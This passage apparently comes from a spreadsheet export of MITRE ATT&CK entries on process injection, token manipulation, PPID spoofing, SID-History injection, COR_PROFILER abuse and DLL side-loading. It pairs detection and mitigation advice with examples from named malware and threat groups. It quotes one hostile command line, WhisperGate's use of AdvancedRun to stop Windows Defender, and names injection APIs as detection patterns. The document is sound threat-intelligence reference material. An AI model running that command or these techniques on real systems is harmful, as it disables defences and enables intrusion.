[Waterbear](https://attack.mitre.org/software/S0579) can inject decrypted shellcode into the LanmanServer service.(Citation: Trend Micro Waterbear December 2019)
Wiarp
[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can inject files into running processes.(Citation: Symantec Wiarp May 2012)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) performs multiple process injections to hijack system processes and execute malicious code.(Citation: Microsoft SIR Vol 21)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can inject code into a targeted process by writing to the remote memory of an infected system and then create a remote thread.(Citation: MalwareBytes WoodyRAT Aug 2022) 
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the “Command_Create&amp;Inject” function.(Citation: Gh0stRAT ATT March 2019)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can inject the loader file, Speech02.db, into a process.(Citation: SentinelLabs Metador Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor for changes made to /proc files that may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Users should not have permission to modify these in most cases. 
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Restrict File and Directory Permissions
Restrict the permissions on sensitive files such as &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; or &lt;code&gt;/proc/[pid]/mem&lt;/code&gt;. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
OS API Execution
Monitor for API calls associated with detecting token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior. Analysts can also monitor for use of Windows APIs such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Privileged Account Management
Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.(Citation: Microsoft Replace Process Token)
Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)
User Account Management
An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call &lt;code&gt;CreateProcessAsUserA&lt;/code&gt; under that user's context.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Tools)
Turla
[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors can impersonate or steal process tokens before executing commands.(Citation: ESET Turla PowerShell May 2019)	
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using &lt;code&gt;runas&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.(Citation: McAfee Bankshot)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;Invoke-RunAs&lt;/code&gt; to make tokens.(Citation: Github PowerShell Empire)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) 
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-RunAs to make tokens.(Citation: GitHub PoshC2)
REvil
[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)
WhisperGate
The [WhisperGate](https://attack.mitre.org/software/S0689) third stage can use the AdvancedRun.exe tool to execute commands in the context of the Windows TrustedInstaller group via `%TEMP%\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run`.(Citation: Cisco Ukraine Wipers January 2022)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a command called RunAs, which creates a new process as another user or process context.(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
OS API Execution
Monitor for API calls associated with detecting token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior, such as LogonUser and SetThreadToken. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators
Privileged Account Management
Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.(Citation: Microsoft Replace Process Token)
Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)
User Account Management
An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.  
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized tools such as Incognito V2 for token manipulation and impersonation.(Citation: Sygnia Elephant Beetle Jan 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can make tokens from known credentials.(Citation: cobaltstrike manual)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can create a token for a different user.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process Access
Monitor for processes being viewed that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.
Process Modification
Monitor for changes made to processes that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has injected malicious code into a new svchost.exe process.(Citation: Bitdefender FIN8 July 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438) performs the injection by attaching its code into the APC queue using NtQueueApcThread API.(Citation: ESET Attor Oct 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can inject itself into a new `svchost.exe -k netsvcs` process using the asynchronous procedure call (APC) queue.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) 
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use asynchronous procedure call (APC) injection to execute commands received from C2.(Citation: Proofpoint Bumblebee April 2022)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has queued an APC routine to explorer.exe by calling ZwQueueApcThread.(Citation: Prevx Carberp March 2011)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used &lt;code&gt;ZwQueueApcThread&lt;/code&gt; to inject itself into remote processes.(Citation: IBM IcedID November 2017)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has used the NtQueueApcThread syscall to inject code into svchost.exe.(Citation: Trustwave Pillowmint June 2020)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.(Citation: Malwarebytes Saint Bot April 2021)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) can use the `QueueUserAPC` API to execute shellcode on a compromised machine.(Citation: Symantec FIN8 Jul 2023)
TURNEDUP
[TURNEDUP](https://attack.mitre.org/software/S0199) is capable of injecting code into the APC queue of a created [Rundll32](https://attack.mitre.org/techniques/T1218/011) process as part of an "Early Bird injection."(Citation: CyberBit Early Bird Apr 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Consider monitoring for excessive use of &lt;code&gt;SendMessage&lt;/code&gt; and/or &lt;code&gt;PostMessage&lt;/code&gt; API functions with &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and/or &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; arguments.
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&lt;code&gt;FindWindow&lt;/code&gt;, &lt;code&gt;FindWindowEx&lt;/code&gt;, &lt;code&gt;EnumWindows&lt;/code&gt;, &lt;code&gt;EnumChildWindows&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be abused for this technique. 
Process Modification
Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Analyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. 
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process.
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has used ListPlanting to inject code into a trusted process.(Citation: ESET InvisiMole June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
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&lt;code&gt;CreateRemoteThread&lt;/code&gt; and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Process Access
Monitor for processes being viewed that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.
Process Modification
Monitor for changes made to processes that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. 
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can download a remote access tool, [ShiftyBug](https://attack.mitre.org/software/S0294), and inject into another process.(Citation: Unit 42 Gorgon Group Aug 2018)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106)'s miner, "TermsHost.exe", evaded defenses by injecting itself into Windows processes, including Notepad.exe.(Citation: Talos Rocke August 2018)	
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) downloads an executable and injects it directly into a new process.(Citation: FireEye CARBANAK June 2017)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to inject a PE binary into a remote process.(Citation: ESET GreyEnergy Oct 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)	
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can execute PE files in the address space of the specified process.(Citation: BiZone Lizar May 2021) 
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) checks processes on the system and if they meet the necessary requirements, it injects into that process.(Citation: GDATA Zeus Panda June 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">OS API Execution
Monitor for API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019)This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.
Process Creation
Monitor for newly constructed processes and/or command-lines that may abuse mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe
Process Metadata
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn processes with alternate PPIDs.(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.(Citation: Malwarebytes Konni Aug 2021) 
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes to account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)
OS API Execution
Monitor for API calls, such as PowerShell's Get-ADUser cmdlet or Windows API DsAddSidHistory function,  to examine data in user’s SID-History attributes, especially users who have SID-History values from the same domain.
User Account Metadata
Examine data in user’s SID-History attributes
Active Directory Configuration
Clean up SID-History attributes after legitimate account migration is complete.
Consider applying SID Filtering to interforest trusts, such as forest trusts and external trusts, to exclude SID-History from requests to access domain resources. SID Filtering ensures that any authentication requests over a trust only contain SIDs of security principals from the trusted domain (i.e preventing the trusted domain from claiming a user has membership in groups outside of the domain).
SID Filtering of forest trusts is enabled by default, but may have been disabled in some cases to allow a child domain to transitively access forest trusts. SID Filtering of external trusts is automatically enabled on all created external trusts using Server 2003 or later domain controllers. (Citation: Microsoft Trust Considerations Nov 2014) (Citation: Microsoft SID Filtering Quarantining Jan 2009) However note that SID Filtering is not automatically applied to legacy trusts or may have been deliberately disabled to allow inter-domain access to resources.
SID Filtering can be applied by: (Citation: Microsoft Netdom Trust Sept 2012)
* Disabling SIDHistory on forest trusts using the netdom tool (&lt;code&gt;netdom trust /domain: /EnableSIDHistory:no&lt;/code&gt; on the domain controller)
* Applying SID Filter Quarantining to external trusts using the netdom tool (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt; on the domain controller)
* Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes. (Citation: Microsoft Netdom Trust Sept 2012) (Citation: AdSecurity Kerberos GT Aug 2015) If a domain within a forest is untrustworthy then it should not be a member of the forest. In this situation it is necessary to first split the trusted and untrusted domains into separate forests where SID Filtering can be applied to an interforest trust
Empire
[Empire](https://attack.mitre.org/software/S0363) can add a SID-History to a user if on a domain controller.(Citation: Github PowerShell Empire)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;MISC::AddSid&lt;/code&gt; module can appended any SID or user/group account to a user's SID-History. [Mimikatz](https://attack.mitre.org/software/S0002) also utilizes [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Modification
Log API calls to assume, create, or impersonate additional roles, policies, and permissions. Review uses of just-in-time access to ensure that any justifications provided are valid and only expected actions were taken.
User Account Management
Limit the privileges of cloud accounts to assume, create, or impersonate additional roles, policies, and permissions to only those required. Where just-in-time access is enabled, consider requiring manual approval for temporary elevation of privileges.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
OS API Execution
Monitor for API calls associated with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators, such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken. 
Privileged Account Management
Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.(Citation: Microsoft Replace Process Token)
Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)
User Account Management
An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.  
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.(Citation: FireEye Op RussianDoll)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.(Citation: Bitdefender FIN8 July 2021)(Citation: Symantec FIN8 Jul 2023)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to duplicate a token from ntprint.exe.(Citation: CheckPoint Naikon May 2020)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can impersonate a `lsass.exe` or `vmtoolsd.exe` token.(Citation: BitDefender BADHATCH Mar 2021) 
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can use the tokens of users to create processes on infected systems.(Citation: Crowdstrike Indrik November 2018)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can steal access tokens from exiting processes.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has the ability to duplicate the user’s token.(Citation: Binary Defense Emotes Wi-Fi Spreader)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) uses token manipulation with NtFilterToken as part of UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.(Citation: ESET Okrum July 2019)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.(Citation: GitHub Pupy)
REvil
[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can find a process owned by a specific user and impersonate the associated token.(Citation: GitHub SILENTTRINITY Modules July 2019)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using &lt;code&gt;LogonUser&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.(Citation: McAfee Shamoon December 2018)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) impersonates the main thread of &lt;code&gt;CExecSvc.exe&lt;/code&gt; by calling &lt;code&gt;NtImpersonateThread&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) attempts to impersonate an anonymous token to enumerate bindings in the service control manager.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Tarrask
[Tarrask](https://attack.mitre.org/software/S1011) leverages token theft to obtain `lsass.exe` security permissions.(Citation: Tarrask scheduled task) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Extra scrutiny should be placed on suspicious modification of Registry keys such as COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075). Monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection.
Module Load
Monitor DLL files that are associated with COR_PROFILER environment variables.
Process Creation
Monitor for newly executed processes, such as setx.exe, that may abuse of the COR_PROFILER variable, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020)
Windows Registry Key Modification
For detecting system and user scope abuse of the COR_PROFILER variable, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools.
Execution Prevention
Identify and block potentially malicious unmanaged COR_PROFILER profiling DLLs  by using application control solutions like AppLocker that are capable of auditing and/or blocking unapproved DLLs.(Citation: Beechey 2010)(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker)
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys associated with COR_PROFILER.
User Account Management
Limit the privileges of user accounts so that only authorized administrators can edit system environment variables.
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.(Citation: RedCanary Mockingbird May 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active.(Citation: Secureworks DarkTortilla Aug 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files in common folders on the computer system.
File Modification
Monitor for changes made to files for unexpected modifications to access permissions and attributes  
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Monitor newly constructed processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs.
Application Developer Guidance
When possible, include hash values in manifest files to help prevent side-loading of malicious libraries.(Citation: FireEye DLL Side-Loading)
Update Software
Update software regularly to include patches that fix DLL side-loading vulnerabilities.
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.(Citation: Cybereason OperationCuckooBees May 2022)
APT19
[APT19](https://attack.mitre.org/groups/G0073) launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.(Citation: Unit 42 C0d0so0 Jan 2016)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to side load DLLs with a valid version of Chrome with one of their tools.(Citation: FireEye Clandestine Fox)(Citation: FireEye Clandestine Fox Part 2)
APT32
[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019) 
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used legitimate applications to side-load malicious DLLs.(Citation: Trend Micro Tick November 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.(Citation: Trend Micro Waterbear December 2019) 
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used side loading to place malicious DLLs in memory.(Citation: NCC Group Chimera January 2021)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) 
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used IISCrack.dll as a side-loading technique to load a malicious version of httpodbc.dll on old IIS Servers (CVE-2001-0507).(Citation: Sygnia Elephant Beetle Jan 2022)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used DLL side-loading to covertly load [PoisonIvy](https://attack.mitre.org/software/S0012) into memory on the victim machine.(Citation: Cybereason Soft Cell June 2019)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126)’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the &lt;code&gt;OINFO12.OCX&lt;/code&gt; dynamic link library.(Citation: PTSecurity Higaisa 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has replaced `win_fw.dll`, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.(Citation: ESET Twitter Ida Pro Nov 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used legitimate executables such as `winword.exe` and `igfxem.exe` to side-load their malware.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a legitimately signed executable to execute a malicious payload within a DLL file.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used DLL side-loading to load malicious DLL's into legitimate executables.(Citation: CheckPoint Naikon May 2020)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) .dll that contains [BADNEWS](https://attack.mitre.org/software/S0128) is loaded and executed using DLL side-loading.(Citation: TrendMicro Patchwork Dec 2017)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.(Citation: ATT Sidewinder January 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used DLL side-loading, including by using legitimate Kaspersky antivirus variants as well as `rc.exe`, a legitimate Microsoft Resource Compiler.(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Lunghi Iron Tiger Linux)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: Anomali Pirate Panda April 2020)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as [UPPERCUT](https://attack.mitre.org/software/S0275).(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 Sept 2018)(Citation: Symantec Cicada November 2020)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) typically loads its DLL file into a legitimate signed Java or VMware executable.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)
BBSRAT
DLL side-loading has been used to execute [BBSRAT](https://attack.mitre.org/software/S0127) through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with [BBSRAT](https://attack.mitre.org/software/S0127) by the dropper.(Citation: Palo Alto Networks BBSRAT)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has loaded a malicious DLL by spoofing the name of the legitimate Version.DLL  and placing it in the same folder as the digitally-signed Microsoft binary OneDriveUpdater.exe.(Citation: Palo Alto Brute Ratel July 2022)
Chinoxy
[Chinoxy](https://attack.mitre.org/software/S1041) can use a digitally signed binary ("Logitech Bluetooth Wizard Host Process") to load its dll into memory.(Citation: Bitdefender FunnyDream Campaign November 2020)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Denis
[Denis](https://attack.mitre.org/software/S0354) exploits a security vulnerability to load a fake DLL and execute its code.(Citation: Cybereason Oceanlotus May 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) can abuse legitimate Windows executables to side-load malicious DLL files.(Citation: Red Canary Dridex Threat Report 2021)
Ecipekac
